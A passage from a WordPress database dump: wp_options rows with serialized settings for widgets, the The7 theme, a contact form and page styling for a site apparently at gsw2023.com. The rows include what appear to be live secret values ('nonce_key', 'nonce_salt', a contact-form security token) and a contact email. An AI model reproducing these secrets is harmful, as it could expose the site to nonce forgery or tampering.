(106,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(107,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(108,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),
(109,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(110,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(111,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(112,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(113,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),
(114,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),
(115,'nonce_key','l 2[Up)U$8aTQU,r[7eV|$/}xi!buBBf|40)X[*Rm><`G=TQs-CZbKH{%]F4ATW0','no'),
(116,'nonce_salt','V}$Yo$67TS)SJtt=<83*6o`pRbKG+HZQd@k,F?h8^`VN/=6!+v53,f,Gs>]X!0L}','no'),
(117,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(118,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(119,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(121,'recovery_keys','a:0:{}','yes'),
(124,'theme_mods_twentytwentytwo','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1664832836;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:3:{i:0;s:7:\"block-2\";i:1;s:7:\"block-3\";i:2;s:7:\"block-4\";}s:9:\"sidebar-2\";a:2:{i:0;s:7:\"block-5\";i:1;s:7:\"block-6\";}}}}','yes'),
(128,'https_detection_errors','a:1:{s:20:\"https_request_failed\";a:1:{i:0;s:21:\"HTTPS request failed.\";}}','yes'),
(157,'finished_updating_comment_type','1','yes'),
(161,'current_theme','The7','yes'),
(162,'theme_mods_dt-the7','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:6:{s:7:\"primary\";i:5;s:6:\"mobile\";i:5;s:10:\"split_left\";i:5;s:11:\"split_right\";i:5;s:3:\"top\";i:5;s:19:\"header_microwidget2\";i:5;}s:18:\"custom_css_post_id\";i:4823;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1692965413;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:11:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";i:6;s:7:\"block-2\";i:7;s:7:\"block-3\";i:8;s:7:\"block-4\";i:9;s:7:\"block-5\";i:10;s:7:\"block-6\";}s:9:\"sidebar_1\";a:3:{i:0;s:31:\"presscore-contact-form-widget-2\";i:1;s:21:\"presscore-portfolio-2\";i:2;s:21:\"presscore-portfolio-3\";}s:9:\"sidebar_2\";a:0:{}}}}','yes'),
(163,'theme_switched','','yes'),
(165,'the7_purchase_code','the7_purchase_code','no'),
(167,'the7_dev_tool_option','a:8:{s:11:\"theme_title\";s:4:\"The7\";s:9:\"theme_url\";s:16:\"https://the7.io/\";s:12:\"theme_author\";s:11:\"Dream-Theme\";s:16:\"theme_author_uri\";s:24:\"https://dream-theme.com/\";s:17:\"theme_description\";s:384:\"Any design, any layout. No coding required. The7 is the most customisable WordPress theme on the market up to date. Add the power of Visual Composer, The7 Post Types, Ultimate Addons, Slider Revolution, and WooCommerce to the mix, and you’ll get the ultimate web-site building toolkit! Theme is translation ready, compatible with WPML, SEO and mobile friendly (certified by Google).\";s:10:\"theme_tags\";s:186:\"multipurpose, responsive, retina ready, SEO ready, mobile friendly, iOS, material design, clean, minimal, business, corporate, portfolio, creative, photography, one page site, micro site\";s:10:\"theme_name\";s:4:\"The7\";s:10:\"screenshot\";s:0:\"\";}','yes'),
(168,'the7_theme_activation_log','a:2:{i:0;a:2:{s:7:\"version\";s:6:\"11.0.1\";s:12:\"activated_at\";i:1664832838;}i:1;a:2:{s:7:\"version\";s:6:\"11.7.3\";s:12:\"activated_at\";i:1692964657;}}','no'),
(169,'widget_presscore-contact-info-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(170,'widget_presscore-custom-menu-one','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(171,'widget_presscore-custom-menu-two','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(172,'widget_presscore-blog-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(173,'widget_presscore-blog-categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(174,'widget_presscore-progress-bars-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(175,'widget_presscore-contact-form-widget','a:2:{i:2;a:7:{s:5:\"title\";s:13:\"Get in Touch!\";s:4:\"text\";s:0:\"\";s:6:\"fields\";a:8:{s:4:\"name\";a:2:{s:2:\"on\";b:1;s:8:\"required\";b:1;}s:5:\"email\";a:2:{s:2:\"on\";b:1;s:8:\"required\";b:1;}s:9:\"telephone\";a:2:{s:2:\"on\";b:0;s:8:\"required\";b:0;}s:7:\"country\";a:2:{s:2:\"on\";b:0;s:8:\"required\";b:0;}s:4:\"city\";a:2:{s:2:\"on\";b:0;s:8:\"required\";b:0;}s:7:\"company\";a:2:{s:2:\"on\";b:0;s:8:\"required\";b:0;}s:7:\"website\";a:2:{s:2:\"on\";b:0;s:8:\"required\";b:0;}s:7:\"message\";a:2:{s:2:\"on\";b:1;s:8:\"required\";b:0;}}s:7:\"send_to\";s:7:\"Submit!\";s:10:\"msg_height\";i:3;s:11:\"button_size\";s:1:\"m\";s:12:\"button_title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),
(176,'widget_presscore-accordion-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(178,'the7_dismissed_admin_notices','a:8:{i:1;s:36:\"the7_show_registration_splash_screen\";i:2;s:36:\"the7_show_registration_splash_screen\";i:3;s:36:\"the7_show_registration_splash_screen\";i:4;s:36:\"the7_show_registration_splash_screen\";i:5;s:36:\"the7_show_registration_splash_screen\";i:6;s:36:\"the7_show_registration_splash_screen\";i:7;s:36:\"the7_show_registration_splash_screen\";i:8;s:36:\"the7_show_registration_splash_screen\";}','yes'),
(179,'the7_force_regen_css','','yes'),
(180,'the7_beautiful_loader_inline_css','body #load {\n  display: block;\n  height: 100%;\n  overflow: hidden;\n  position: fixed;\n  width: 100%;\n  z-index: 9901;\n  opacity: 1;\n  visibility: visible;\n  transition: all .35s ease-out;\n}\n.load-wrap {\n  width: 100%;\n  height: 100%;\n  background-position: center center;\n  background-repeat: no-repeat;\n  text-align: center;\n  display: -ms-flexbox;\n  display: -ms-flex;\n  display: flex;\n  -ms-align-items: center;\n  -ms-flex-align: center;\n  align-items: center;\n  -ms-flex-flow: column wrap;\n  flex-flow: column wrap;\n  -ms-flex-pack: center;\n  -ms-justify-content: center;\n  justify-content: center;\n}\n.load-wrap > svg {\n  position: absolute;\n  top: 50%;\n  left: 50%;\n  transform: translate(-50%,-50%);\n}\n#load {\n  background: var(--the7-elementor-beautiful-loading-bg,#ffffff);\n  --the7-beautiful-spinner-color2: var(--the7-beautiful-spinner-color,rgba(59,140,237,0.5));\n}\n','yes'),
(181,'the7_style_version','11.7.3','yes'),
(183,'the7_plugins_last_check','1698127740','no'),
(184,'optionsframework','a:2:{s:2:\"id\";s:4:\"the7\";s:12:\"knownoptions\";a:1:{i:0;s:4:\"the7\";}}','yes'),
(185,'the7','a:997:{s:31:\"advanced-fvm_enable_integration\";s:1:\"1\";s:27:\"advanced-fvm_script_timeout\";s:4:\"50ms\";s:35:\"advanced-normalize_resize_on_mobile\";s:1:\"1\";s:25:\"advanced-speed_img_resize\";s:1:\"1\";s:21:\"blog-fancy_date-style\";s:6:\"circle\";s:26:\"blog-thumbnail_proportions\";a:2:{s:5:\"width\";i:2;s:6:\"height\";i:1;}s:19:\"blog-thumbnail_size\";s:6:\"resize\";s:19:\"bottom_bar-bg_color\";s:19:\"rgba(51,51,51,0.12)\";s:19:\"bottom_bar-bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:3:\"top\";}s:25:\"bottom_bar-collapse_after\";s:5:\"990px\";s:16:\"bottom_bar-color\";s:7:\"#85868c\";s:21:\"bottom_bar-copyrights\";s:0:\"\";s:18:\"bottom_bar-credits\";b:0;s:18:\"bottom_bar-enabled\";s:1:\"0\";s:17:\"bottom_bar-height\";s:4:\"60px\";s:17:\"bottom_bar-layout\";s:9:\"logo_left\";s:20:\"bottom_bar-line_size\";s:3:\"1px\";s:23:\"bottom_bar-logo-padding\";s:16:\"5px 12px 5px 0px\";s:18:\"bottom_bar-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:23:\"bottom_bar-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:30:\"bottom_bar-menu-collapse_after\";s:5:\"778px\";s:18:\"bottom_bar-padding\";s:9:\"10px 10px\";s:16:\"bottom_bar-style\";s:18:\"content_width_line\";s:15:\"bottom_bar-text\";s:62:\"Copyright © 2022-2023 - All Rights Reserved - www.gsw2023.com\";s:22:\"breadcrumbs-typography\";a:4:{s:11:\"font_family\";s:6:\"Roboto\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"23\";}s:20:\"breadcrumbs_bg_color\";s:19:\"rgba(255,255,255,0)\";s:24:\"breadcrumbs_border_color\";s:21:\"rgba(146,160,175,0.2)\";s:25:\"breadcrumbs_border_radius\";s:3:\"0px\";s:24:\"breadcrumbs_border_width\";s:3:\"1px\";s:18:\"breadcrumbs_margin\";s:16:\"10px 0px 0px 0px\";s:19:\"breadcrumbs_padding\";s:15:\"0px 0px 0px 0px\";s:13:\"button-shadow\";a:6:{s:5:\"color\";s:13:\"rgba(0,0,0,0)\";s:10:\"horizontal\";s:1:\"0\";s:8:\"vertical\";s:1:\"0\";s:4:\"blur\";s:2:\"10\";s:6:\"spread\";s:1:\"0\";s:8:\"position\";s:7:\"outline\";}s:19:\"button-shadow-hover\";a:6:{s:5:\"color\";s:13:\"rgba(0,0,0,0)\";s:10:\"horizontal\";s:1:\"0\";s:8:\"vertical\";s:1:\"0\";s:4:\"blur\";s:2:\"10\";s:6:\"spread\";s:1:\"0\";s:8:\"position\";s:7:\"outline\";}s:20:\"buttons-border-color\";s:7:\"#ffffff\";s:25:\"buttons-border-color_mode\";s:6:\"accent\";s:13:\"buttons-color\";s:7:\"#81d742\";s:22:\"buttons-color_gradient\";s:31:\"135deg|#cc2e7d 30%|#e56027 100%\";s:18:\"buttons-color_mode\";s:6:\"accent\";s:26:\"buttons-hover-border-color\";s:7:\"#ffffff\";s:31:\"buttons-hover-border-color_mode\";s:6:\"accent\";s:19:\"buttons-hover_color\";s:7:\"#6ca9f2\";s:28:\"buttons-hover_color_gradient\";s:31:\"135deg|#cc4789 30%|#e57544 100%\";s:24:\"buttons-hover_color_mode\";s:5:\"color\";s:26:\"buttons-l-custom-icon-size\";s:1:\"1\";s:19:\"buttons-l-icon-size\";s:2:\"16\";s:20:\"buttons-l-min-height\";s:3:\"1px\";s:19:\"buttons-l-min-width\";s:3:\"1px\";s:20:\"buttons-l-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:23:\"buttons-l_border_radius\";s:3:\"4px\";s:22:\"buttons-l_border_width\";s:3:\"0px\";s:17:\"buttons-l_padding\";s:19:\"18px 24px 18px 24px\";s:27:\"buttons-lg-custom-icon-size\";b:0;s:26:\"buttons-m-custom-icon-size\";s:1:\"1\";s:19:\"buttons-m-icon-size\";s:2:\"14\";s:20:\"buttons-m-min-height\";s:3:\"1px\";s:19:\"buttons-m-min-width\";s:3:\"1px\";s:20:\"buttons-m-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"14\";}s:23:\"buttons-m_border_radius\";s:3:\"4px\";s:22:\"buttons-m_border_width\";s:3:\"0px\";s:17:\"buttons-m_padding\";s:19:\"12px 18px 12px 18px\";s:26:\"buttons-s-custom-icon-size\";s:1:\"1\";s:19:\"buttons-s-icon-size\";s:2:\"12\";s:20:\"buttons-s-min-height\";s:3:\"1px\";s:19:\"buttons-s-min-width\";s:3:\"1px\";s:20:\"buttons-s-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"12\";}s:23:\"buttons-s_border_radius\";s:3:\"4px\";s:22:\"buttons-s_border_width\";s:3:\"0px\";s:17:\"buttons-s_padding\";s:17:\"8px 12px 8px 12px\";s:18:\"buttons-text_color\";s:7:\"#ffffff\";s:23:\"buttons-text_color_mode\";s:5:\"color\";s:24:\"buttons-text_hover_color\";s:7:\"#ffffff\";s:29:\"buttons-text_hover_color_mode\";s:5:\"color\";s:27:\"buttons-xl-custom-icon-size\";b:0;s:20:\"contact_form_message\";s:1:\"1\";s:33:\"contact_form_recaptcha_secret_key\";s:0:\"\";s:31:\"contact_form_recaptcha_site_key\";s:0:\"\";s:27:\"contact_form_security_token\";s:20:\"eed685ff90c0efbbe983\";s:21:\"content-headers_color\";s:7:\"#333333\";s:19:\"content-links_color\";s:7:\"#4169e1\";s:26:\"content-primary_text_color\";s:7:\"#8b8d94\";s:28:\"content-secondary_text_color\";s:7:\"#adafb3\";s:21:\"custom_error_messages\";s:48:\"The message has not been sent. Please try again.\";s:32:\"custom_error_messages_validation\";s:61:\"One or more fields have an error. Please check and try again.\";s:23:\"custom_success_messages\";s:27:\"Your message has been sent.\";s:14:\"dividers-color\";s:16:\"rgba(0,0,0,0.08)\";s:17:\"filter-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:9:\"uppercase\";s:9:\"font_size\";s:2:\"14\";}s:14:\"fonts-big_size\";a:2:{s:9:\"font_size\";s:4:\"16px\";s:11:\"line_height\";s:4:\"29px\";}s:17:\"fonts-font_family\";s:4:\"Aleo\";s:19:\"fonts-h1-typography\";a:4:{s:11:\"font_family\";s:8:\"Aleo:700\";s:20:\"responsive_font_size\";a:3:{s:7:\"desktop\";s:4:\"54px\";s:6:\"tablet\";s:4:\"44px\";s:6:\"mobile\";s:4:\"44px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"64px\";}s:14:\"text_transform\";s:4:\"none\";}s:20:\"fonts-h1_font_family\";s:9:\"Arial:600\";s:19:\"fonts-h2-typography\";a:4:{s:11:\"font_family\";s:8:\"Aleo:700\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"44px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"54px\";}s:14:\"text_transform\";s:4:\"none\";}s:19:\"fonts-h3-typography\";a:4:{s:11:\"font_family\";s:8:\"Aleo:700\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"30px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"40px\";}s:14:\"text_transform\";s:4:\"none\";}s:19:\"fonts-h4-typography\";a:4:{s:11:\"font_family\";s:8:\"Aleo:700\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"22px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"32px\";}s:14:\"text_transform\";s:4:\"none\";}s:19:\"fonts-h5-typography\";a:4:{s:11:\"font_family\";s:8:\"Aleo:700\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"18px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"26px\";}s:14:\"text_transform\";s:4:\"none\";}s:19:\"fonts-h6-typography\";a:4:{s:11:\"font_family\";s:8:\"Aleo:700\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"16px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"26px\";}s:14:\"text_transform\";s:4:\"none\";}s:25:\"fonts-headers-font-family\";s:0:\"\";s:28:\"fonts-headers-text-transform\";s:0:\"\";s:17:\"fonts-normal_size\";a:2:{s:9:\"font_size\";s:4:\"14px\";s:11:\"line_height\";s:4:\"26px\";}s:16:\"fonts-small_size\";a:2:{s:9:\"font_size\";s:4:\"13px\";s:11:\"line_height\";s:4:\"23px\";}s:20:\"fonts-widget-content\";a:4:{s:11:\"font_family\";s:4:\"Aleo\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"14px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"26px\";}s:14:\"text_transform\";s:4:\"none\";}s:18:\"fonts-widget-title\";a:4:{s:11:\"font_family\";s:8:\"Aleo:700\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"18px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"26px\";}s:14:\"text_transform\";s:4:\"none\";}s:24:\"footer-accent_text_color\";s:0:\"\";s:15:\"footer-bg_color\";s:7:\"#f4f4f4\";s:15:\"footer-bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:3:\"top\";}s:21:\"footer-collapse_after\";s:5:\"778px\";s:29:\"footer-collapse_columns_after\";s:5:\"778px\";s:17:\"footer-decoration\";s:4:\"none\";s:27:\"footer-decoration-line_size\";s:3:\"1px\";s:31:\"footer-decoration_outline_color\";s:21:\"rgba(129,215,66,0.96)\";s:20:\"footer-headers_color\";s:7:\"#333333\";s:19:\"footer-is_fullwidth\";s:1:\"1\";s:13:\"footer-layout\";s:3:\"1/1\";s:21:\"footer-mobile_padding\";s:19:\"60px 20px 25px 20px\";s:14:\"footer-padding\";s:19:\"60px 50px 25px 50px\";s:23:\"footer-paddings-columns\";s:4:\"25px\";s:25:\"footer-primary_text_color\";s:7:\"#85868c\";s:21:\"footer-slide-out-mode\";s:1:\"0\";s:12:\"footer-style\";s:16:\"solid_background\";s:23:\"general-accent_bg_color\";s:7:\"#3b8ced\";s:32:\"general-accent_bg_color_gradient\";s:31:\"135deg|#3eb4e6 30%|#58ddde 100%\";s:25:\"general-accent_color_mode\";s:5:\"color\";s:29:\"general-album_back_button_url\";s:0:\"\";s:25:\"general-album_meta_author\";b:0;s:29:\"general-album_meta_categories\";b:0;s:27:\"general-album_meta_comments\";b:0;s:23:\"general-album_meta_date\";b:0;s:21:\"general-album_meta_on\";s:1:\"1\";s:25:\"general-beautiful_loading\";s:7:\"enabled\";s:16:\"general-bg_color\";s:19:\"rgba(255,255,255,1)\";s:16:\"general-bg_fixed\";b:0;s:21:\"general-bg_fullscreen\";b:0;s:16:\"general-bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:3:\"top\";}s:24:\"general-blog_meta_author\";b:0;s:28:\"general-blog_meta_categories\";b:0;s:26:\"general-blog_meta_comments\";b:0;s:22:\"general-blog_meta_date\";b:0;s:20:\"general-blog_meta_on\";s:1:\"0\";s:22:\"general-blog_meta_tags\";b:0;s:21:\"general-border_radius\";s:3:\"4px\";s:17:\"general-box_width\";s:6:\"1340px\";s:22:\"general-boxed_bg_color\";s:7:\"#f7f7f7\";s:22:\"general-boxed_bg_fixed\";s:1:\"1\";s:27:\"general-boxed_bg_fullscreen\";b:0;s:22:\"general-boxed_bg_image\";a:4:{s:5:\"image\";s:57:\"/images/backgrounds/patterns/full/crisp_paper_ruffles.jpg\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:3:\"top\";}s:28:\"general-breadcrumbs_bg_color\";s:8:\"disabled\";s:25:\"general-breadcrumbs_color\";s:7:\"#b4b5bb\";s:33:\"general-contact_form_send_mail_to\";s:16:\"info@gsw2023.com\";s:30:\"general-content_boxes_bg_color\";s:7:\"#f5f5f5\";s:32:\"general-content_boxes_decoration\";s:4:\"none\";s:46:\"general-content_boxes_decoration_outline_color\";s:13:\"rgba(0,0,0,0)\";s:21:\"general-content_width\";s:6:\"1300px\";s:18:\"general-custom_css\";s:0:\"\";s:21:\"general-custom_loader\";s:0:\"\";s:15:\"general-favicon\";s:51:\"/wp-content/uploads/2023/06/remote_sensing_logo.png\";s:18:\"general-favicon_hd\";s:51:\"/wp-content/uploads/2023/06/remote_sensing_logo.png\";s:21:\"general-filter-margin\";s:17:\"0px 15px 0px 15px\";s:22:\"general-filter-padding\";s:15:\"5px 0px 5px 0px\";s:20:\"general-filter_style\";s:3:\"ios\";s:39:\"general-filter_style-material-line_size\";s:3:\"2px\";s:42:\"general-filter_style-minimal-border_radius\";s:5:\"100px\";s:32:\"general-fullscreen_overlay_color\";s:19:\"rgba(255,255,255,1)\";s:37:\"general-fullscreen_overlay_color_mode\";s:5:\"color\";s:35:\"general-fullscreen_overlay_gradient\";s:31:\"135deg|#8224e3 30%|#dd3333 100%\";s:34:\"general-fullscreen_overlay_opacity\";s:3:\"100\";s:30:\"general-handheld_icon-old_ipad\";s:0:\"\";s:32:\"general-handheld_icon-old_iphone\";s:0:\"\";s:33:\"general-handheld_icon-retina_ipad\";s:0:\"\";s:35:\"general-handheld_icon-retina_iphone\";s:0:\"\";s:27:\"general-images_lazy_loading\";s:1:\"1\";s:14:\"general-layout\";s:4:\"wide\";s:27:\"general-lightbox_arrow_size\";s:4:\"62px\";s:32:\"general-lightbox_overlay_opacity\";s:2:\"85\";s:20:\"general-loader_style\";s:16:\"square_jelly_box\";s:25:\"general-navigation_margin\";s:4:\"50px\";s:26:\"general-next_prev_in_album\";s:1:\"1\";s:25:\"general-next_prev_in_blog\";s:1:\"0\";s:30:\"general-next_prev_in_portfolio\";s:1:\"0\";s:29:\"general-page-title-typography\";a:4:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"24\";s:11:\"line_height\";s:2:\"34\";}s:27:\"general-page_content_margin\";s:19:\"70px 50px 70px 50px\";s:34:\"general-page_content_mobile_margin\";s:19:\"70px 20px 70px 20px\";s:29:\"general-portfolio_meta_author\";b:0;s:33:\"general-portfolio_meta_categories\";b:0;s:31:\"general-portfolio_meta_comments\";b:0;s:27:\"general-portfolio_meta_date\";b:0;s:25:\"general-portfolio_meta_on\";s:1:\"0\";s:39:\"general-portfolio_thumbnail_proportions\";a:2:{s:5:\"width\";i:2;s:6:\"height\";i:1;}s:32:\"general-portfolio_thumbnail_size\";s:6:\"resize\";s:28:\"general-post_back_button_url\";s:0:\"\";s:31:\"general-project_back_button_url\";s:0:\"\";s:28:\"general-rel_posts_head_title\";s:13:\"Related posts\";s:21:\"general-rel_posts_max\";s:1:\"6\";s:28:\"general-rel_projects_details\";s:1:\"1\";s:28:\"general-rel_projects_excerpt\";b:0;s:31:\"general-rel_projects_head_title\";s:16:\"Related projects\";s:32:\"general-rel_projects_info_author\";b:0;s:36:\"general-rel_projects_info_categories\";s:1:\"1\";s:34:\"general-rel_projects_info_comments\";b:0;s:30:\"general-rel_projects_info_date\";b:0;s:25:\"general-rel_projects_link\";b:0;s:24:\"general-rel_projects_max\";s:2:\"12\";s:26:\"general-rel_projects_title\";s:1:\"1\";s:25:\"general-rel_projects_zoom\";s:1:\"1\";s:18:\"general-responsive\";s:1:\"1\";s:31:\"general-responsive_title_height\";s:5:\"100px\";s:36:\"general-responsive_title_line_height\";s:2:\"30\";s:29:\"general-responsive_title_size\";s:2:\"20\";s:27:\"general-show_author_in_blog\";s:1:\"0\";s:33:\"general-show_back_button_in_album\";s:1:\"1\";s:32:\"general-show_back_button_in_post\";s:1:\"0\";s:35:\"general-show_back_button_in_project\";s:1:\"1\";s:24:\"general-show_breadcrumbs\";s:1:\"1\";s:22:\"general-show_rel_posts\";s:1:\"0\";s:25:\"general-show_rel_projects\";s:1:\"0\";s:19:\"general-show_titles\";s:1:\"1\";s:21:\"general-smooth_scroll\";s:3:\"off\";s:21:\"general-spinner_color\";s:20:\"rgba(59,140,237,0.5)\";s:31:\"general-switch_content_paddings\";s:5:\"778px\";s:19:\"general-title_align\";s:8:\"all_left\";s:22:\"general-title_bg_color\";s:16:\"rgba(0,0,0,0.04)\";s:27:\"general-title_bg_fullscreen\";b:0;s:25:\"general-title_bg_gradient\";s:29:\"0deg|#4a66d6 30%|#12b4ea 100%\";s:22:\"general-title_bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:21:\"general-title_bg_mode\";s:10:\"background\";s:24:\"general-title_bg_overlay\";b:0;s:25:\"general-title_bg_parallax\";s:1:\"0\";s:19:\"general-title_color\";s:7:\"#333333\";s:24:\"general-title_decoration\";s:4:\"none\";s:35:\"general-title_decoration_line_color\";s:18:\"rgba(130,36,227,1)\";s:36:\"general-title_decoration_line_height\";s:3:\"5px\";s:35:\"general-title_decoration_line_style\";s:6:\"dashed\";s:38:\"general-title_decoration_outline_color\";s:18:\"rgba(30,115,190,0)\";s:39:\"general-title_decoration_outline_height\";s:3:\"1px\";s:38:\"general-title_decoration_outline_style\";s:5:\"solid\";s:27:\"general-title_enable_bg_img\";s:8:\"disabled\";s:20:\"general-title_height\";s:5:\"150px\";s:27:\"general-title_overlay_color\";s:15:\"rgba(0,0,0,0.5)\";s:36:\"general-title_responsive_breadcrumbs\";s:1:\"1\";s:27:\"general-title_scroll_effect\";s:8:\"parallax\";s:36:\"general-titles-responsiveness-switch\";s:5:\"778px\";s:29:\"general-titles_responsiveness\";s:1:\"1\";s:21:\"general-tracking_code\";s:0:\"\";s:17:\"header-background\";s:6:\"normal\";s:15:\"header-bg-color\";s:7:\"#ffffff\";s:15:\"header-bg-image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:18:\"header-bg-is_fixed\";b:0;s:23:\"header-bg-is_fullscreen\";b:0;s:23:\"header-classic-elements\";a:4:{s:12:\"top_bar_left\";a:1:{i:0;s:13:\"working_hours\";}s:13:\"top_bar_right\";a:1:{i:0;s:6:\"search\";}s:15:\"near_menu_right\";a:1:{i:0;s:12:\"social_icons\";}s:15:\"near_logo_right\";a:2:{i:0;s:5:\"phone\";i:1;s:5:\"email\";}}s:51:\"header-classic-elements-near_logo-custom-icon-color\";s:0:\"\";s:50:\"header-classic-elements-near_logo-custom-icon-size\";s:2:\"16\";s:44:\"header-classic-elements-near_logo-font_color\";s:7:\"#333333\";s:44:\"header-classic-elements-near_logo-typography\";a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:9:\"font_size\";s:2:\"13\";}s:46:\"header-classic-elements-near_logo_left-padding\";s:15:\"0px 0px 0px 0px\";s:47:\"header-classic-elements-near_logo_right-padding\";s:15:\"0px 0px 0px 0px\";s:51:\"header-classic-elements-near_menu-custom-icon-color\";s:0:\"\";s:50:\"header-classic-elements-near_menu-custom-icon-size\";s:2:\"16\";s:44:\"header-classic-elements-near_menu-font_color\";s:7:\"#333333\";s:44:\"header-classic-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:700\";s:9:\"font_size\";s:2:\"13\";}s:47:\"header-classic-elements-near_menu_right-padding\";s:16:\"0px 0px 0px 40px\";s:21:\"header-classic-height\";s:5:\"200px\";s:27:\"header-classic-is_fullwidth\";s:1:\"0\";s:28:\"header-classic-logo-position\";s:6:\"center\";s:28:\"header-classic-menu-bg-color\";s:7:\"#4169e1\";s:28:\"header-classic-menu-bg-style\";s:5:\"solid\";s:29:\"header-classic-menu-line_size\";s:3:\"1px\";s:26:\"header-classic-menu-margin\";s:7:\"0px 0px\";s:28:\"header-classic-menu-position\";s:6:\"center\";s:28:\"header-classic-show_elements\";s:1:\"0\";s:27:\"header-classic-side-padding\";s:9:\"30px 30px\";s:30:\"header-classic-switch_paddings\";s:3:\"0px\";s:30:\"header-classic_mobile_paddings\";s:7:\"0px 0px\";s:17:\"header-decoration\";s:8:\"disabled\";s:23:\"header-decoration-color\";s:17:\"rgba(221,51,51,1)\";s:27:\"header-decoration-line_size\";s:3:\"1px\";s:27:\"header-elements-button-1-bg\";s:6:\"accent\";s:33:\"header-elements-button-1-bg-color\";s:7:\"#ffffff\";s:36:\"header-elements-button-1-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 